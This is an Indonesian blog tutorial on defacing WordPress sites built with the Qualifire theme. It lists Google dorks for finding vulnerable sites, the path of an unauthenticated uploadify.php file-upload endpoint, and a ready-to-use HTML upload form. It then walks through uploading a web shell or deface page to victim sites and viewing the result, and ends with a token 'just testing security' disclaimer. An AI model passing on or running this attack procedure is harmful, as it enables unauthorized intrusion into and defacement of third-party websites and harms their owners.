Deface Web Metode Qualifire

File Upload


Dalam dunia IT pasti  sering tuh denger sama yang namanya deface. Deface sendiri memiliki

pengerti an merubah tampi lan atau halaman suatu situs web dengan memanfaatkan bug / celah

yang ada di web tersebut..

Nah sesuai dengan judul di atas, saya mau share salah satu teknik deface web. Teknik ini masih tergolong teknik cupu

Untuk melakukan teknik ini gk perduli apa OS pc sobat, yang penting terkoneksi dengan internet dan punya internet browser

Ok daripada banyak basa­basi mending lagsung aja ke tkp

1. Pertama searchi ng di google pake dork di bawah i ni

Dork :

– inurl:”/wp­content/themes/qualifire”

– inurl:”/wp­content/themes/qualifire” site:.fr

NB : Untuk yang make linux bisa searching pake BinGoo

2. Kalo udah dapet webnya tinggal tambahin exploitnya

Exploit : /wp­content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Disini saya coba pake web yang di bawah ini


Dan tampilan webnya setelah ditambah exploits yang di atas
Kalo webnya vuln kayak gambar di atas ( blank puti h atau nampilin karakter/huruf yang nda jelas )
tapi kalo 404 not found berarti anda kurang gagah    ( Cari target lain )


3. Copy script CSRF di bawah ini lalu simpan dengan ekstensi .html
<form
action=”http://target.com/wp­content/themes/qualifire/scripts/admin/uploadi fy/uploadify.php&#8221; method=”post”
enctype=”multipart/form­data”>
<label for=”file”>Filename:</label>
<input type=”fi le” name=”Filedata” ><br>
<input type=”submit” name=”submit” value=”Submi t”>
</form>


* Save As: .html (contoh.html)

* edi t/ganti target.com ~> menjadi link target yang sobat temukan


4. Lalu buka file yang berekstensi .html yang teman­teman buat tadi
Maka tampi lannya akan seperti ini


5. Lalu klik browse kemudian pi lih file yang mau temen­temen upload ( bisa shell, script deface, gambar ataupun file .txt ) Tapi Disini saya mau upload script deface
Setelah itu kli k “SUBMIT”

6. Kalo uploadnya berhasil, akan muncul angka 1. Tapi kalo muncul tulisan “You Don’t Have Pemi ssi on bla bla bla” berarti anda masih belum cukup gagah  ( cari  target lain lagi )

7. Dan yang terakhir temen­temen coba dah lihat hasil upload tadi  dengan cara
ketikkan situs.com/namafileyangsobatuploadtadi Nih contohnya dari hasil upload script deface saya

Done   GOOD JOB (y)

Mungkin itu saja yang bisa saya share kali ini… Sampai bertemu di lain kesempatan

NB : Gunakan Dengan Bijak

Saya tidak bertanggung jawab atas apa yang terjadi dengan website korban

( saya cuman testing security om )